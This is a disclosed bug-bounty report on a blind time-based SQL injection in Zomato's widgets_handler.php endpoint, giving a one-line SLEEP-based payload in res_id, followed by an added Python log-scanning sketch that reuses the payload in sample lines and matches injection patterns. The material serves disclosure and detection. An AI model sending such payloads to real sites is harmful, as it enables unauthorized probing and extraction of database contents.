[www.zomato.com] Blind SQL Injection in /php/widgets_handler.php
Critical
Zomato
Team Summary
Official summary from Zomato
Disclosing it as per the request from @zzzhacker13. This report is identical to #838855 but it was just on a different endpoint.

### POC

- `:/php/widgets_handler.php?method=getResWidgetButton&res_id=51-CASE/**/WHEN(LENGTH(version())=10)THEN(SLEEP(6*1))END`

Zomato Security Team
Reported by
zzzhacker13
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Bounty
$2000.00
Submitted
Weakness
SQL Injection
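
The following detection sketch is an added example, not part of the report or of Zomato's code. It scans access-log lines for requests where `res_id` carries SQL syntax instead of an integer and notes whether the response was delayed, as the `SLEEP(6*1)` in the PoC would cause. The log format, the sample lines, the assumption that `res_id` is a plain integer, and the function names are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: res_id is a plain integer restaurant id.
NUMERIC_PARAMS = {"res_id"}

# SQL constructs seen in time-based blind injection, including those in the PoC.
SQLI_TOKENS = re.compile(
    r"(?i)\b(?:sleep|benchmark|pg_sleep)\s*\(|\bcase\b.*\bwhen\b|/\*.*?\*/|\bversion\s*\("
)

# Constructed log format: combined-style line with request time (seconds) last.
LOG_LINE = re.compile(r'"(?:GET|POST) (?P<url>\S+) HTTP/[\d.]+" \d{3} \S+ (?P<rt>[\d.]+)$')

# Constructed sample lines (documentation IP ranges, arbitrary timestamps).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2020:10:00:00 +0000] "GET /php/widgets_handler.php'
    '?method=getResWidgetButton&res_id=51 HTTP/1.1" 200 512 0.041',
    '198.51.100.7 - - [01/Jan/2020:10:00:05 +0000] "GET /php/widgets_handler.php'
    '?method=getResWidgetButton&res_id=51-CASE/**/WHEN(LENGTH(version())=10)'
    'THEN(SLEEP(6*1))END HTTP/1.1" 200 512 6.038',
    '203.0.113.9 - - [01/Jan/2020:10:01:00 +0000] "GET /php/widgets_handler.php'
    '?method=getResWidgetButton&res_id=abc HTTP/1.1" 200 0 0.030',
]

def inspect_request(url):
    """Return (param, reason) findings for numeric parameters with bad values."""
    findings = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if name in NUMERIC_PARAMS and not re.fullmatch(r"[0-9]+", value):
            sqli = SQLI_TOKENS.search(value)
            reason = "SQL syntax in numeric parameter" if sqli else "non-numeric value"
            findings.append((name, reason))
    return findings

def scan(lines, slow_seconds=5.0):
    """Flag suspicious requests and mark those whose response was delayed."""
    alerts = []
    for line in lines:
        m = LOG_LINE.search(line)
        if not m:
            continue  # line does not match the assumed format
        for name, reason in inspect_request(m.group("url")):
            delayed = float(m.group("rt")) >= slow_seconds
            alerts.append({"param": name, "reason": reason, "delayed": delayed})
    return alerts

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

The same integer check applied server-side before the value reaches the query, together with a parameterized statement, removes the injection point rather than only detecting it.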